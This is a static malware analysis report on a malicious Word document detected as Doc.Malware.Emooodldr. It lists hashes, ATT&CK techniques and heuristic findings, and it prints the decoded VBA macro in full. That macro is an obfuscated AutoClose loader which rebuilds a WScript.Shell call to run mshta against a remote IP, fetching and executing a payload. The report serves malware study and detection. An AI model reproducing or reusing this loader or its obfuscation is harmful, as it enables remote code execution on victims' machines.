Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ff9785c05c087898…

MALICIOUS

Office (OOXML)

54.5 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-02-04
MD5: 228a7bb6a6d10523afff39da47621133 SHA-1: a7a638420c84ea2957df25d9798859ff9c6d7744 SHA-256: ff9785c05c08789800db47812c4e70ab892ecdba07189aa38fe0edbc4b87837d
322 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a critical heuristic firing for an obfuscated auto-exec VBA loader, specifically an Auto_Close macro that uses CreateObject to execute code. The VBA script attempts to download a payload from the URL "http://198.55.107.156/oxYNPkSZMKNHU/cRkVvbUViWjNojWFRWxEgTwxzxgkoUYkriFUxYNPkSZMKNHU.php?uojWFRWxEgTwxxYNPkSZMKNHUBLziTwFpEnWR=hond". This indicates a downloader or droppper functionality.

Heuristics 7

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2775 bytes
SHA-256: 5a0dc6d28b39edd6fdacdbb0d72df1c96c79ba25e90a5d6c56cca3bc38bdbac5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub caatinga()
 OfRXDZvYcEv = "G" & Trim("M") & Trim("P") & "C"
buvdHSM = 1508 - 1784 - 176
viRRiLSNG = 1338 + 180 + 743 + 1583
KJOIxjbZyQ = 687 + 413 + 274 + 1888
XcpnDWZcEi = 723 - 1342 - 1828 - 1766 - 1679 - 529

 curvo = "xYNPkSZMKNHUcRkVvbUViWjNhojWFRWxEgTwxBLziTwFpEnWR hojWFRWxEgTwxojWFRWxEgTwxp://198.55.107.156/oxYNPkSZMKNHUxYNPkSZMKNHU/cRkVvbUViWjNojWFRWxEgTwxzxgkoUYkriFUxYNPkSZMKNHU.php?uojWFRWxEgTwxxYNPkSZMKNHUBLziTwFpEnWR=hond"
curvo = Replace(curvo, "xYNPkSZMKNHU", "m")
HQGiqEPbBRxi = 1738 - 332 - 1152 - 1158 - 1249 - 1761
GuFwrnn = 674 + 1279 + 1425 + 980 + 2000
MAWXiyQi = 1093 + 1292 + 1385 + 1800 + 1657 + 258
curvo = Replace(curvo, "BLziTwFpEnWR", "a")
VvWEgPoj = "V" & Trim("j") & "o" & "O" & "R"
curvo = Replace(curvo, "cRkVvbUViWjN", "s")
curvo = Replace(curvo, "ojWFRWxEgTwx", "t")
qOkOSCObZ = Trim("E") & "Z" & "o" & Trim("O")
curvo = Replace(curvo, "zxgkoUYkriFU", "e")
wDCUVbC = "K" & "x" & "H" & "I"
PVQqwCn = 1868 + 1994 + 197 + 2 + 1367
cxdqLTc = Trim("n") & Trim("r")
qHVEJEEYNBo = Trim("N") & "f" & "W" & "c" & "V"
curvo = Replace(curvo, "pFRgUFwrZHgE", "l")
bcuMXBKDUxB = "K" & "P" & "C" & Trim("q")
WzTWYbALFkzL = Trim("H") & "O" & "b" & Trim("J")
iJJqrqoEQR = Trim("k") & "K" & "J"

gibi = "WScripQKqTiqiCXNZG.ShUyPMRDryHoZSNvdHduucgNnyNvdHduucgNny"
gibi = Replace(gibi, "CVnYNrNFxnpf", "m")
gibi = Replace(gibi, "KJAdRFyDdkJy", "a")
pVLVqHz = "r" & Trim("S") & Trim("A") & Trim("y")
PWzFHZU = 996 - 339 - 608 - 1481 - 1325 - 696 - 1836
DLYQuCoYiP = 1051 - 557 - 1450 - 1345 - 48 - 1051
gibi = Replace(gibi, "onibgpNgWyNf", "s")
gibi = Replace(gibi, "QKqTiqiCXNZG", "t")
gibi = Replace(gibi, "UyPMRDryHoZS", "e")
gibi = Replace(gibi, "NvdHduucgNny", "l")
iNLDfxI = Trim("v") & "Q" & "S"
ZkLobjjT = 404 + 26 + 18 + 372 + 269 + 1574


 CreateObject(gibi).Run curvo, 0
 DATEdKC = "q" & Trim("b") & Trim("A") & "f"
RRNZfpq = 1666 + 1871 + 278 + 1410
qrTVBfbFFrXq = 1495 - 776 - 1181 - 1108 - 393
pKFIbPKUYqA = 679 - 704 - 243 - 321 - 397 - 1871
YRELYnbqM = 328 + 1441 + 208 + 280

End Sub

Sub AutoClose()

  NFdJLCxSOyd = 166 + 720 + 836 + 411 + 783 + 224
yQDCGwBUu = 991 - 914 - 1789 - 140 - 928 - 1050
HjKgyRN = 1095 - 624 - 772 - 1532
KULDPzxk = 720 - 1598 - 455

  Application.Run "caatinga"
  QOgiPHJ = "j" & Trim("O")
HXBPTLNkP = "N" & Trim("V") & "K" & "M" & Trim("Y")
KrLcWJFIIdV = 735 + 1811 + 983 + 1808
BzrJbdRqKSjf = Trim("F") & Trim("w") & Trim("u") & "R" & "C"

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 13312 bytes
SHA-256: 0212a12ca122993b74ecf4e3439115ea95d97a8814b17c78715735eb2bcee60a
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.